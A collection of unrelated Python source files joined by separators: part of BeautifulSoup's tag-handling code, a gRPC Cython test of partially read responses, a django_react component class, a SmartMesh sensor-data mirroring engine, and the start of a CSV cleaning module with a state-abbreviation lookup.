parserClass = _alias("parser_class") # BS3
@property
def is_empty_element(self):
"""Is this tag an empty-element tag? (aka a self-closing tag)
A tag that has contents is never an empty-element tag.
A tag that has no contents may or may not be an empty-element
tag. It depends on the builder used to create the tag. If the
builder has a designated list of empty-element tags, then only
a tag whose name shows up in that list is considered an
empty-element tag.
If the builder has no designated list of empty-element tags,
then any tag with no contents is an empty-element tag.
"""
return len(self.contents) == 0 and self.can_be_empty_element
isSelfClosing = is_empty_element # BS3
@property
def string(self):
"""Convenience property to get the single string within this tag.
:Return: If this tag has a single string child, return value
is that string. If this tag has no children, or more than one
child, return value is None. If this tag has one child tag,
return value is the 'string' attribute of the child tag,
recursively.
"""
if len(self.contents) != 1:
return None
child = self.contents[0]
if isinstance(child, NavigableString):
return child
return child.string
@string.setter
def string(self, string):
self.clear()
self.append(string)
def _all_strings(self, strip=False):
"""Yield all child strings, possibly stripping them."""
for descendant in self.descendants:
if not isinstance(descendant, NavigableString):
continue
if strip:
descendant = descendant.strip()
if len(descendant) == 0:
continue
yield descendant
strings = property(_all_strings)
@property
def stripped_strings(self):
for string in self._all_strings(True):
yield string
def get_text(self, separator="", strip=False):
"""
Get all child strings, concatenated using the given separator.
"""
return separator.join([s for s in self._all_strings(strip)])
getText = get_text
text = property(get_text)
def decompose(self):
"""Recursively destroys the contents of this tree."""
self.extract()
i = self
while i is not None:
next = i.next_element
i.__dict__.clear()
i = next
def clear(self, decompose=False):
"""
Extract all children. If decompose is True, decompose instead.
"""
if decompose:
for element in self.contents[:]:
if isinstance(element, Tag):
element.decompose()
else:
element.extract()
else:
for element in self.contents[:]:
element.extract()
def index(self, element):
"""
Find the index of a child by identity, not value. Avoids issues with
tag.contents.index(element) getting the index of equal elements.
"""
for i, child in enumerate(self.contents):
if child is element:
return i
raise ValueError("Tag.index: element not in tag")
def get(self, key, default=None):
"""Returns the value of the 'key' attribute for the tag, or
the value given for 'default' if it doesn't have that
attribute."""
return self.attrs.get(key, default)
def has_attr(self, key):
return key in self.attrs
def __getitem__(self, key):
"""tag[key] returns the value of the 'key' attribute for the tag,
and throws an exception if it's not there."""
return self.attrs[key]
def __iter__(self):
"Iterating over a tag iterates over its contents."
return iter(self.contents)
def __len__(self):
"The length of a tag is the length of its list of contents."
return len(self.contents)
def __contains__(self, x):
return x in self.contents
def __nonzero__(self):
"A tag is non-None even if it has no contents."
return True
def __setitem__(self, key, value):
"""Setting tag[key] sets the value of the 'key' attribute for the
tag."""
self.attrs[key] = value
def __delitem__(self, key):
"Deleting tag[key] deletes all 'key' attributes for the tag."
self.attrs.pop(key, None)
def __call__(self, *args, **kwargs):
"""Calling a tag like a function is the same as calling its
find_all() method. Eg. tag('a') returns a list of all the A tags
found within this tag."""
return self.find_all(args, kwargs)
def __getattr__(self, tag):
#print "Getattr %s.%s" % (self.__class__, tag)
if len(tag) > 3 and tag.endswith('Tag'):
# BS3: soup.aTag -> "soup.find("a")
tag_name = tag[:-3]
warnings.warn(
'.%sTag is deprecated, use .find("%s") instead.' % (
tag_name, tag_name))
return self.find(tag_name)
# We special case contents to avoid recursion.
elif not tag.startswith("__") and not tag=="contents":
return self.find(tag)
raise AttributeError(
"'%s' object has no attribute '%s'" % (self.__class__, tag))
def __eq__(self, other):
"""Returns true iff this tag has the same name, the same attributes,
and the same contents (recursively) as the given tag."""
if self is other:
return True
if (not hasattr(other, 'name') or
not hasattr(other, 'attrs') or
not hasattr(other, 'contents') or
self.name != other.name or
self.attrs != other.attrs or
len(self) != len(other)):
return False
for i, my_child in enumerate(self.contents):
if my_child != other.contents[i]:
return False
return True
def __ne__(self, other):
"""Returns true iff this tag is not identical to the other tag,
as defined in __eq__."""
return not self == other
def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
"""Renders this tag as a string."""
return self.encode(encoding)
def __unicode__(self):
return self.decode()
def __str__(self):
return self.encode()
if PY3K:
__str__ = __repr__ = __unicode__
def encode(self, encoding=DEFAULT_OUTPUT_ENCODING,
indent_level=None, substitute_html_entities=False):
return self.decode(indent_level, encoding,
substitute_html_entities).encode(encoding)
def decode(self, indent_level=None,
eventual_encoding=DEFAULT_OUTPUT_ENCODING,
substitute_html_entities=False):
"""Returns a Unicode representation of this tag and its contents.
:param eventual_encoding: The tag is destined to be
encoded into this encoding. This method is _not_
responsible for performing that encoding. This information
is passed in so that it can be substituted in if the
document contains a <META> tag that mentions the document's
encoding.
"""
attrs = []
if self.attrs:
for key, val in sorted(self.attrs.items()):
if val is None:
decoded = key
else:
if not isinstance(val, basestring):
val = str(val)
if (self.contains_substitutions
and eventual_encoding is not None
and '%SOUP-ENCODING%' in val):
val = self.substitute_encoding(val, eventual_encoding)
decoded = (key + '='
+ EntitySubstitution.substitute_xml(val, True))
attrs.append(decoded)
close = ''
closeTag = ''
if self.is_empty_element:
close = ' /'
else:
closeTag = '</%s>' % self.name
pretty_print = (indent_level is not None)
if pretty_print:
space = (' ' * (indent_level - 1))
indent_contents = indent_level + 1
else:
space = ''
indent_contents = None
contents = self.decode_contents(
indent_contents, eventual_encoding, substitute_html_entities)
if self.hidden:
# This is the 'document root' object.
s = contents
else:
s = []
attribute_string = ''
if attrs:
attribute_string = ' ' + ' '.join(attrs)
if pretty_print:
s.append(space)
s.append('<%s%s%s>' % (self.name, attribute_string, close))
if pretty_print:
s.append("\n")
s.append(contents)
if pretty_print and contents and contents[-1] != "\n":
s.append("\n")
if pretty_print and closeTag:
s.append(space)
s.append(closeTag)
if pretty_print and closeTag and self.next_sibling:
s.append("\n")
s = ''.join(s)
return s
def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
return self.encode(encoding, True)
def decode_contents(self, indent_level=None,
eventual_encoding=DEFAULT_OUTPUT_ENCODING,
substitute_html_entities=False):
"""Renders the contents of this tag as a Unicode string.
:param eventual_encoding: The tag is destined to be
encoded into this encoding. This method is _not_
responsible for performing that encoding. This information
is passed in so that it can be substituted in if the
document contains a <META> tag that mentions the document's
encoding.
"""
pretty_print = (indent_level is not None)
s = []
for c in self:
text = None
if isinstance(c, NavigableString):
text = c.output_ready(substitute_html_entities)
elif isinstance(c, Tag):
s.append(c.decode(indent_level, eventual_encoding,
substitute_html_entities))
if text and indent_level:
text = text.strip()
if text:
if pretty_print:
s.append(" " * (indent_level - 1))
s.append(text)
if pretty_print:
s.append("\n")
return ''.join(s)
#Soup methods
def find(self, name=None, attrs={}, recursive=True, text=None,
**kwargs):
"""Return only the first child of this Tag matching the given
criteria."""
r = None
l = self.find_all(name, attrs, recursive, text, 1, **kwargs)
if l:
r = l[0]
return r
findChild = find
def find_all(self, name=None, attrs={}, recursive=True, text=None,
limit=None, **kwargs):
"""Extracts a list of Tag objects that match the given
criteria. You can specify the name of the Tag and any
attributes you want the Tag to have.
The value of a key-value pair in the 'attrs' map can be a
string, a list of strings, a regular expression object, or a
callable that takes a string and returns whether or not the
string matches for some custom definition of 'matches'. The
same is true of the tag name."""
generator = self.descendants
if not recursive:
generator = self.children
return self._find_all(name, attrs, text, limit, generator, **kwargs)
findAll = find_all # BS3
findChildren = find_all # BS2
#Generator methods
@property
def children(self):
# return iter() to make the purpose of the method clear
return iter(self.contents) # XXX This seems to be untested.
@property
def descendants(self):
if not len(self.contents):
return
stopNode = self._last_descendant().next_element
current = self.contents[0]
while current is not stopNode:
yield current
current = current.next_element
# Old names for backwards compatibility
def childGenerator(self):
return self.children
def recursiveChildGenerator(self):
return self.descendants
# This was kind of misleading because has_key() (attributes) was
# different from __in__ (contents). has_key() is gone in Python 3,
# anyway.
has_key = has_attr
# Next, a couple classes to represent queries and their results.
class SoupStrainer(object):
"""Encapsulates a number of ways of matching a markup element (tag or
text)."""
def __init__(self, name=None, attrs={}, text=None, **kwargs):
self.name = name
if isinstance(attrs, basestring):
kwargs['class'] = _match_css_class(attrs)
attrs = None
if kwargs:
if attrs:
attrs = attrs.copy()
attrs.update(kwargs)
else:
attrs = kwargs
self.attrs = attrs
self.text = text
def __str__(self):
if self.text:
return self.text
else:
return "%s|%s" % (self.name, self.attrs)
def search_tag(self, markup_name=None, markup_attrs={}):
found = None
markup = None
if isinstance(markup_name, Tag):
markup = markup_name
markup_attrs = markup
call_function_with_tag_data = (
isinstance(self.name, collections.Callable)
and not isinstance(markup_name, Tag))
if ((not self.name)
or call_function_with_tag_data
or (markup and self._matches(markup, self.name))
or (not markup and self._matches(markup_name, self.name))):
if call_function_with_tag_data:
match = self.name(markup_name, markup_attrs)
else:
match = True
markup_attr_map = None
for attr, match_against in list(self.attrs.items()):
if not markup_attr_map:
if hasattr(markup_attrs, 'get'):
markup_attr_map = markup_attrs
else:
markup_attr_map = {}
for k, v in markup_attrs:
markup_attr_map[k] = v
attr_value = markup_attr_map.get(attr)
if not self._matches(attr_value, match_against):
match = False
break
if match:
if markup:
found = markup
else:
found = markup_name
return found
searchTag = search_tag
def search(self, markup):
#print 'looking for %s in %s' % (self, markup)
found = None
# If given a list of items, scan it for a text element that
# matches.
if hasattr(markup, '__iter__') and not isinstance(markup, (Tag, basestring)):
for element in markup:
if isinstance(element, NavigableString) \
and self.search(element):
found = element
break
# If it's a Tag, make sure its name or attributes match.
# Don't bother with Tags if we're searching for text.
elif isinstance(markup, Tag):
if not self.text:
found = self.search_tag(markup)
# If it's text, make sure the text matches.
elif isinstance(markup, NavigableString) or \
isinstance(markup, basestring):
if self._matches(markup, self.text):
found = markup
else:
raise Exception(
"I don't know how to match against a %s" % markup.__class__)
return found
def _matches(self, markup, match_against):
#print "Matching %s against %s" % (markup, match_against)
result = False
if match_against is True:
result = markup is not None
elif isinstance(match_against, collections.Callable):
result = match_against(markup)
else:
#Custom match methods take the tag as an argument, but all
#other ways of matching match the tag name as a string.
if isinstance(markup, Tag):
markup = markup.name
if markup is not None and not isinstance(markup, basestring):
markup = unicode(markup)
#Now we know that chunk is either a string, or None.
if hasattr(match_against, 'match'):
# It's a regexp object.
result = markup and match_against.search(markup)
elif (hasattr(match_against, '__iter__')
and markup is not None
and not isinstance(match_against, basestring)):
result = markup in match_against
elif hasattr(match_against, 'items'):
result = match_against in markup
elif match_against and isinstance(markup, basestring):
match_against = markup.__class__(match_against)
if not result:
result = match_against == markup
return result
class ResultSet(list):
"""A ResultSet is just a list that keeps track of the SoupStrainer
that created it."""
def __init__(self, source):
list.__init__([])
self.source = source
| |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test a corner-case at the level of the Cython API."""
import threading
import unittest
from grpc._cython import cygrpc
from tests.unit._cython import test_utilities
_EMPTY_FLAGS = 0
_EMPTY_METADATA = ()
class _ServerDriver(object):
def __init__(self, completion_queue, shutdown_tag):
self._condition = threading.Condition()
self._completion_queue = completion_queue
self._shutdown_tag = shutdown_tag
self._events = []
self._saw_shutdown_tag = False
def start(self):
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events.append(event)
self._condition.notify()
if event.tag is self._shutdown_tag:
self._saw_shutdown_tag = True
break
thread = threading.Thread(target=in_thread)
thread.start()
def done(self):
with self._condition:
return self._saw_shutdown_tag
def first_event(self):
with self._condition:
while not self._events:
self._condition.wait()
return self._events[0]
def events(self):
with self._condition:
while not self._saw_shutdown_tag:
self._condition.wait()
return tuple(self._events)
class _QueueDriver(object):
def __init__(self, condition, completion_queue, due):
self._condition = condition
self._completion_queue = completion_queue
self._due = due
self._events = []
self._returned = False
def start(self):
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events.append(event)
self._due.remove(event.tag)
self._condition.notify_all()
if not self._due:
self._returned = True
return
thread = threading.Thread(target=in_thread)
thread.start()
def done(self):
with self._condition:
return self._returned
def event_with_tag(self, tag):
with self._condition:
while True:
for event in self._events:
if event.tag is tag:
return event
self._condition.wait()
def events(self):
with self._condition:
while not self._returned:
self._condition.wait()
return tuple(self._events)
class ReadSomeButNotAllResponsesTest(unittest.TestCase):
def testReadSomeButNotAllResponses(self):
server_completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server([(
b'grpc.so_reuseport',
0,
)], False)
server.register_completion_queue(server_completion_queue)
port = server.add_http2_port(b'[::]:0')
server.start()
channel = cygrpc.Channel('localhost:{}'.format(port).encode(), set(),
None)
server_shutdown_tag = 'server_shutdown_tag'
server_driver = _ServerDriver(server_completion_queue,
server_shutdown_tag)
server_driver.start()
client_condition = threading.Condition()
client_due = set()
server_call_condition = threading.Condition()
server_send_initial_metadata_tag = 'server_send_initial_metadata_tag'
server_send_first_message_tag = 'server_send_first_message_tag'
server_send_second_message_tag = 'server_send_second_message_tag'
server_complete_rpc_tag = 'server_complete_rpc_tag'
server_call_due = set((
server_send_initial_metadata_tag,
server_send_first_message_tag,
server_send_second_message_tag,
server_complete_rpc_tag,
))
server_call_completion_queue = cygrpc.CompletionQueue()
server_call_driver = _QueueDriver(server_call_condition,
server_call_completion_queue,
server_call_due)
server_call_driver.start()
server_rpc_tag = 'server_rpc_tag'
request_call_result = server.request_call(server_call_completion_queue,
server_completion_queue,
server_rpc_tag)
client_receive_initial_metadata_tag = 'client_receive_initial_metadata_tag'
client_complete_rpc_tag = 'client_complete_rpc_tag'
client_call = channel.segregated_call(
_EMPTY_FLAGS, b'/twinkies', None, None, _EMPTY_METADATA, None, (
(
[
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
],
client_receive_initial_metadata_tag,
),
(
[
cygrpc.SendInitialMetadataOperation(
_EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
],
client_complete_rpc_tag,
),
))
client_receive_initial_metadata_event_future = test_utilities.SimpleFuture(
client_call.next_event)
server_rpc_event = server_driver.first_event()
with server_call_condition:
server_send_initial_metadata_start_batch_result = (
server_rpc_event.call.start_server_batch([
cygrpc.SendInitialMetadataOperation(_EMPTY_METADATA,
_EMPTY_FLAGS),
], server_send_initial_metadata_tag))
server_send_first_message_start_batch_result = (
server_rpc_event.call.start_server_batch([
cygrpc.SendMessageOperation(b'\x07', _EMPTY_FLAGS),
], server_send_first_message_tag))
server_send_initial_metadata_event = server_call_driver.event_with_tag(
server_send_initial_metadata_tag)
server_send_first_message_event = server_call_driver.event_with_tag(
server_send_first_message_tag)
with server_call_condition:
server_send_second_message_start_batch_result = (
server_rpc_event.call.start_server_batch([
cygrpc.SendMessageOperation(b'\x07', _EMPTY_FLAGS),
], server_send_second_message_tag))
server_complete_rpc_start_batch_result = (
server_rpc_event.call.start_server_batch([
cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),
cygrpc.SendStatusFromServerOperation(
(), cygrpc.StatusCode.ok, b'test details',
_EMPTY_FLAGS),
], server_complete_rpc_tag))
server_send_second_message_event = server_call_driver.event_with_tag(
server_send_second_message_tag)
server_complete_rpc_event = server_call_driver.event_with_tag(
server_complete_rpc_tag)
server_call_driver.events()
client_recieve_initial_metadata_event = client_receive_initial_metadata_event_future.result(
)
client_receive_first_message_tag = 'client_receive_first_message_tag'
client_call.operate([
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
], client_receive_first_message_tag)
client_receive_first_message_event = client_call.next_event()
client_call_cancel_result = client_call.cancel(
cygrpc.StatusCode.cancelled, 'Cancelled during test!')
client_complete_rpc_event = client_call.next_event()
channel.close(cygrpc.StatusCode.unknown, 'Channel closed!')
server.shutdown(server_completion_queue, server_shutdown_tag)
server.cancel_all_calls()
server_driver.events()
self.assertEqual(cygrpc.CallError.ok, request_call_result)
self.assertEqual(cygrpc.CallError.ok,
server_send_initial_metadata_start_batch_result)
self.assertIs(server_rpc_tag, server_rpc_event.tag)
self.assertEqual(cygrpc.CompletionType.operation_complete,
server_rpc_event.completion_type)
self.assertIsInstance(server_rpc_event.call, cygrpc.Call)
if __name__ == '__main__':
unittest.main(verbosity=2)
| |
import sys
import hashlib
import json
from django.template.loader import render_to_string
from django.contrib.staticfiles import finders
from django.utils.safestring import mark_safe
from django.utils import six
from django_react.settings import REACT_EXTERNAL
from .exceptions import (
ReactComponentCalledDirectly, ReactComponentMissingSource, PropSerializationError, ComponentBundlingError,
)
from .render import render_component
from .bundles import ReactBundle
class ReactComponent(object):
source = None
path_to_source = None
url_to_source = None
props = None
serialized_props = None
variable = None
props_variable = None
bundle = ReactBundle
def __init__(self, **kwargs):
# As we use the subclass's name to generate a number of client-side
# variables, we disallow directly calling the ReactComponent class
if self.__class__ is ReactComponent:
raise ReactComponentCalledDirectly('Components must inherit from ReactComponent')
# Ensure that a source file is defined in either `source` or `path_to_source`
if self.get_path_to_source() is None:
raise ReactComponentMissingSource(self)
# All kwargs are passed to the component as props, this replicates
# the API used in React+JSX
self.props = kwargs
def render_to_string(self, wrap=None):
"""
Render a component to its initial HTML. You can use this method to generate HTML
on the server and send the markup down on the initial request for faster page loads
and to allow search engines to crawl you pages for SEO purposes.
`render_to_string` takes an optional argument `wrap` which, if set to False, will
prevent the the rendered output from being wrapped in the container element
generated by the component's `render_container` method.
Note that the rendered HTML will be wrapped in a container element generated by the component's
`render_container` method.
```
{{ component.render_to_string }}
```
"""
rendered = render_component(
path_to_source=self.get_path_to_source(),
serialized_props=self.get_serialized_props(),
)
if wrap is None:
return self.render_container(
content=mark_safe(rendered)
)
return rendered
def render_to_static_markup(self, wrap=None):
"""
Similar to `ReactComponent.render_to_string`, except this doesn't create
extra DOM attributes such as `data-react-id`, that React uses internally.
This is useful if you want to use React as a simple static page generator,
as stripping away the extra attributes can save lots of bytes.
```
{{ component.render_to_static_markup }}
```
"""
rendered = render_component(
path_to_source=self.get_path_to_source(),
serialized_props=self.get_serialized_props(),
to_static_markup=True,
)
if wrap is None:
return self.render_container(
content=mark_safe(rendered)
)
return rendered
def render_js(self):
"""
Renders the script elements containing the component's props, source and
initialisation.
`render_js` is effectively shorthand for calling each of the component's
`render_props`, `render_source`, and `render_init` methods.
```
{{ component.render_js }}
```
"""
return render_to_string('django_react/js.html', self.get_render_context(
rendered_props=self.render_props(),
rendered_source=self.render_source(),
rendered_init=self.render_init(),
))
def render_container(self, content=None):
"""
Renders a HTML element with attributes which Django React uses internally to
facilitate mounting components with React.
The rendered element is provided with a id attribute which is generated by the component's
`get_container_id` method.
`render_container` takes an optional argument, `content` which should be a string to be
inserted within the element.
```
{{ component.render_container }}
<script>
console.log(document.getElementById('{{ component.get_container_id }}'));
</script>
```
"""
return render_to_string('django_react/container.html', self.get_render_context(
content=content,
container_id=self.get_container_id(),
container_class_name=self.get_container_class_name(),
))
def render_props(self):
"""
Render the component's props as a JavaScript object.
The props will be defined within the browser's global scope under a
variable name generated by the component's `get_props_variable` method.
```
{{ component.render_props }}
<script>
console.log({{ component.get_props_variable }});
</script>
```
"""
return render_to_string('django_react/props.html', self.get_render_context(
props_variable=self.get_props_variable(),
serialized_props=self.get_serialized_props(),
))
def render_source(self):
"""
Render a script element pointing to the bundled source of the component.
The bundled component will be defined within the browser's global scope
under a variable name generated by the component's `get_variable` method.
```
{{ component.render_source }}
<script>
console.log({{ component.get_variable }});
</script>
```
"""
return render_to_string('django_react/source.html', self.get_render_context(
source_url=self.get_url_to_source()
))
def render_init(self):
"""
Render a script element which will create an instance of the component and use
React to mount it in the container created with the component's `render_container`,
`render_to_string`, or `render_to_static_markup` methods.
```
{{ component.render_init }}
```
"""
return render_to_string('django_react/init.html', self.get_render_context(
REACT_EXTERNAL=REACT_EXTERNAL,
variable=self.get_variable(),
props_variable=self.get_props_variable(),
container_id=self.get_container_id(),
))
def get_render_context(self, **kwargs):
# As a convenience for template overrides, the component instance
# is passed into the template
context = {
'component': self,
}
context.update(kwargs)
return context
def get_source(self):
return self.source
def get_path_to_source(self):
if self.path_to_source is None:
source = self.get_source()
self.path_to_source = finders.find(source)
return self.path_to_source
def get_props(self):
return self.props
def get_serialized_props(self):
if self.serialized_props is None:
# While rendering templates Django will silently ignore some types of exceptions,
# so we need to intercept them and raise our own class of exception
try:
self.serialized_props = json.dumps(self.get_props())
except (TypeError, AttributeError) as e:
six.reraise(PropSerializationError, PropSerializationError(*e.args), sys.exc_info()[2])
return self.serialized_props
def get_props_variable(self):
if self.props_variable is None:
serialized_props = self.get_serialized_props()
md5 = hashlib.md5()
md5.update(serialized_props)
self.props_variable = '__propsFor{variable}_{hash}__'.format(
variable=self.get_variable(),
hash=md5.hexdigest(),
)
return self.props_variable
def get_url_to_source(self):
if self.url_to_source is None:
bundle = self.bundle(
entry=self.get_source(),
library=self.get_variable(),
)
# While rendering templates Django will silently ignore some types of exceptions,
# so we need to intercept them and raise our own class of exception
try:
url_to_source = bundle.get_url()
except (TypeError, AttributeError) as e:
six.reraise(ComponentBundlingError, ComponentBundlingError(*e.args), sys.exc_info()[2])
self.url_to_source = url_to_source
return self.url_to_source
def get_variable(self):
if self.variable is None:
self.variable = self.__class__.__name__
return self.variable
def get_container_id(self):
return 'reactComponentContainer-{id}'.format(
id=six.text_type(id(self)),
)
def get_container_class_name(self):
return 'reactComponentContainer reactComponentContainer--{variable}'.format(
variable=self.get_variable(),
)
| |
#!/usr/bin/python
import logging
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('MirrorEngine')
log.setLevel(logging.ERROR)
log.addHandler(NullHandler())
import re
import threading
import copy
from pydispatch import dispatcher
from SmartMeshSDK.protocols.DC2126AConverters import DC2126AConverters
from EventBus import EventBusClient
class MirrorEngine(EventBusClient.EventBusClient):
def __init__(self):
# store params
# log
log.info('creating instance')
# initialize parent class
EventBusClient.EventBusClient.__init__(self,
signal = 'parsedAppData_OAPTemperature',
cb = self._publish,
teardown_cb = self._cleanup,
)
self.name = 'DataConnector_MirrorEngine'
# connect extra applications
dispatcher.connect(
self._addToQueue,
signal = 'parsedAppData_DC2126A',
weak = False,
)
dispatcher.connect(
self._addToQueue,
signal = 'parsedAppData_SPIPressure',
weak = False,
)
dispatcher.connect(
self._addToQueue,
signal = 'parsedAppData_GPIONet',
weak = False,
)
dispatcher.connect(
self._addToQueue,
signal = 'parsedAppData_LIS331',
weak = False,
)
dispatcher.connect(
self._addToQueue,
signal = 'parsedAppData_OAPtilt',
weak = False,
)
dispatcher.connect(
self.getMirrorData,
signal = 'getMirrorData',
weak = False,
)
dispatcher.connect(
self.calibrateMirrorData,
signal = 'calibrateMirrorData',
weak = False,
)
dispatcher.connect(
self.clearMirrorData,
signal = 'clearMirrorData',
weak = False,
)
# add stats
# local variables
self.dataLock = threading.Lock()
self.pressureOffsets = {}
self.mirrordata = []
self.dc2126Aconverters = DC2126AConverters.DC2126AConverters()
#======================== public ==========================================
def getMirrorData(self,sender,signal,data):
with self.dataLock:
return copy.deepcopy(self.mirrordata)
def calibrateMirrorData(self,sender,signal,data):
with self.dataLock:
pressures = {}
for row in self.mirrordata:
if row['type']=='pressure':
pressures[row['mac']] = int(row['lastvalue'].split('_')[0])
if len(pressures)==2:
macs = pressures.keys()
offset = pressures[macs[0]]-pressures[macs[1]]
self.pressureOffsets = {}
self.pressureOffsets[macs[0]] = -offset
self.pressureOffsets[macs[1]] = 0
def clearMirrorData(self,sender,signal,data):
with self.dataLock:
self.mirrordata = []
#======================== private =========================================
def _cleanup(self):
# disconnect extra applications
dispatcher.disconnect(
self._addToQueue,
signal = 'parsedAppData_DC2126A',
weak = False,
)
dispatcher.disconnect(
self._addToQueue,
signal = 'parsedAppData_SPIPressure',
weak = False,
)
dispatcher.disconnect(
self._addToQueue,
signal = 'parsedAppData_GPIONet',
weak = False,
)
dispatcher.disconnect(
self._addToQueue,
signal = 'parsedAppData_LIS331',
weak = False,
)
dispatcher.disconnect(
self._addToQueue,
signal = 'parsedAppData_OAPtilt',
weak = False,
)
dispatcher.disconnect(
self.getMirrorData,
signal = 'getMirrorData',
weak = False,
)
dispatcher.disconnect(
self.calibrateMirrorData,
signal = 'calibrateMirrorData',
weak = False,
)
dispatcher.disconnect(
self.clearMirrorData,
signal = 'clearMirrorData',
weak = False,
)
def _publish(self,sender,signal,data):
# format the data to publish
newData = []
mac = data['mac']
if signal in ['parsedAppData_OAPTemperature']:
# temperature reported in 1/100th C, displayed in C
temperature_C = float(data['fields']['temperature'])/100.0
# format newData entry
newData += [
{
'mac': mac,
'type': 'temperature',
'lastvalue': str(temperature_C),
'lastupdated': str(data['timestamp']),
'subscribeToLed': True,
}
]
elif signal in ['parsedAppData_DC2126A']:
# publish temperature
temperature = self.dc2126Aconverters.convertTemperature(
data['fields']['temperature'],
)
if temperature!=None:
newData += [
{
'mac': mac,
'type': 'temperature',
'lastvalue': str(temperature),
'lastupdated': str(data['timestamp']),
}
]
# publish adcValue
adcValue = self.dc2126Aconverters.convertAdcValue(
data['fields']['adcValue'],
)
newData += [
{
'mac': mac,
'type': 'voltage',
'lastvalue': adcValue,
'lastupdated': str(data['timestamp']),
}
]
# publish energysource
energysource = self.dc2126Aconverters.convertEnergySource(
mac,adcValue,
)
newData += [
{
'mac': mac,
'type': 'energysource',
'lastvalue': energysource,
'lastupdated': str(data['timestamp']),
}
]
elif signal in ['parsedAppData_SPIPressure']:
with self.dataLock:
if mac in self.pressureOffsets:
offset = self.pressureOffsets[mac]
else:
offset = 0
# format newData entry
newData += [
{
'mac': mac,
'type': 'pressure',
'lastvalue': str(data['fields']['adcPressure']) + "_" + str(offset),
'lastupdated': str(data['timestamp']),
}
]
elif signal in ['parsedAppData_GPIONet']:
# convert 'pinVal' field to meaning
if data['fields']['pinVal']==1:
energysource = 'solar'
elif data['fields']['pinVal']==2:
energysource = 'vibration'
elif data['fields']['pinVal']==3:
energysource = 'temperature'
else:
energysource = 'battery'
# format newData entry
newData += [
{
'mac': mac,
'type': 'energysource',
'lastvalue': energysource,
'lastupdated': str(data['timestamp']),
}
]
elif signal in ['parsedAppData_LIS331']:
# format newData entry
newData += [
{
'mac': mac,
'type': 'acceleration',
'lastvalue': '{0}_{1}_{2}'.format(
data['fields']['x'],
data['fields']['y'],
data['fields']['z'],
),
'lastupdated': str(data['timestamp']),
}
]
elif signal in ['parsedAppData_OAPtilt']:
# format newData entry
newData += [
{
'mac': mac,
'type': 'tilt',
'lastvalue': '{0}'.format(data['fields']['status']),
'lastupdated': str(data['timestamp']),
}
]
else:
raise SystemError('unexpected signal={0}'.format(signal))
# store local mirror of data
with self.dataLock:
for nd in newData:
found = False
newDataSource = nd['mac']
newDataType = nd['type']
for i,e in enumerate(self.mirrordata):
if e['mac']==newDataSource and e['type']==newDataType:
found = True
self.mirrordata[i] = nd
break
if not found:
self.mirrordata.append(nd)
# dispatch (once even if multiple data points)
with self.dataLock:
for nd in newData:
dispatcher.send(
signal = 'newDataMirrored',
data = copy.deepcopy(nd),
)
| |
# coding: utf-8
import csv
import cStringIO
import codecs
import logging
logger = logging.getLogger("mandoline.cleaners")
class DictUnicodeWriter(object):
def __init__(self, f, fieldnames, dialect=csv.excel, encoding="utf-8",
**kwds):
# Redirect output to a queue
self.queue = cStringIO.StringIO()
self.writer = csv.DictWriter(self.queue, fieldnames, dialect=dialect,
**kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, D):
self.writer.writerow(
{k: unicode(v).encode("utf-8") for k, v in D.items()})
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for D in rows:
self.writerow(D)
def writeheader(self):
self.writer.writeheader()
class FieldRowCleaner():
pass
class Rename(FieldRowCleaner):
"""
Rename a field to a new name
Rename("a", "b")
{ "a": 1 } => { "b": 1 }
"""
def __init__(self, from_name, to_name):
self.from_name = from_name
self.to_name = to_name
def clean(self, d, from_name, to_name):
d[to_name] = d[from_name]
class CleanWith(FieldRowCleaner):
"""
Takes a cleaning function with signature
clean(row, fieldname) where
row is a dictionary containing the row being cleaned
fieldname is the fieldname being cleaned
The result of the clean function should be to modify row[fieldname]
"""
def __init__(self, clean):
self.clean_func = clean
def clean(self, d, fn):
self.clean_func(d, fn)
class Lookup(FieldRowCleaner):
"""
Use a lookup table to determine a new value for a field
If default is None, then if the value isn't found in the lookup
then use the original value
Lookup("a", { 1: 2}, 4)
{ "a": 1 } => { "a": 2 }
{ "a": 2 } => { "a": 4 } # gets the default value
"""
def __init__(self, lookup, default=None):
self.lookup = lookup
self.default = default
def clean(self, d, fn):
if self.default is None:
d[fn] = self.lookup.get(d[fn], d[fn])
else:
d[fn] = self.lookup.get(d[fn], self.default)
class StateAbbrevLookup(Lookup):
def __init__(self, default=None):
self.default = default
self.lookup = {
"DISTRICT OF COLUMBIA": "DC",
"ALABAMA": "AL",
"ALASKA": "AK",
"ARIZONA": "AZ",
"ARKANSAS": "AR",
"CALIFORNIA": "CA",
"COLORADO": "CO",
"CONNECTICUT": "CT",
"DELAWARE": "DE",
"FLORIDA": "FL",
"GEORGIA": "GA",
"HAWAII": "HI",
"IDAHO": "ID",
"ILLINOIS": "IL",
"INDIANA": "IN",
"IOWA": "IA",
"KANSAS": "KS",
"KENTUCKY": "KY",
"LOUISIANA": "LA",
"MAINE": "ME",
"MARYLAND": "MD",
"MASSACHUSETTS": "MA",
"MICHIGAN": "MI",
"MINNESOTA": "MN",
"MISSISSIPPI": "MS",
"MISSOURI": "MO",
"MONTANA": "MT",
"NEBRASKA": "NE",
"NEVADA": "NV",
